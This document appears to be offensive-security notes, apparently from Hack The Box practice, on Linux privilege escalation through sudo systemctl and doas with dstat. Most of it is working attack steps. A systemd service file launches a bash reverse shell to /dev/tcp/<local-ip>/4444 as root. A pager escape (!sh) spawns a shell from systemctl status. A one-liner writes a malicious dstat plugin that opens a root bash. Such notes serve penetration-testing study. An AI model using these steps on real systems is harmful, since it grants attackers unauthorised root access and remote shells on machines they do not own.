Sudo Privilege escalation

GTFOBins

Systemctl

systemctl is vulnerable to privilege escalation by modifying the configuration file.

Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl

If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.

Case #1 Modify the configuration file

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!

Finally restart the service

sudo systemctl daemon-reload
sudo systemctl restart example.service
Copied!

Case #2 systemctl permissions to see the status

Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl status example.service

If we can execute systemctl status as root, we can spawn another shell in the pager.

sudo systemctl status example.service
!sh

Doas

doas is an alternative to sudo typically found on OpenBSD operating systems, but that can be installed on Debian-base Linux OSes like Ubuntu.

#Find doas configuration file
Intrusionz3r0@kali:~$ find / -name doas.conf 2>/dev/null

#Write Malcious Plugin
Intrusionz3r0@kali:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_Intrusionz3r0.py

#Execute
doas /usr/bin/dstat --Intrusionz3r0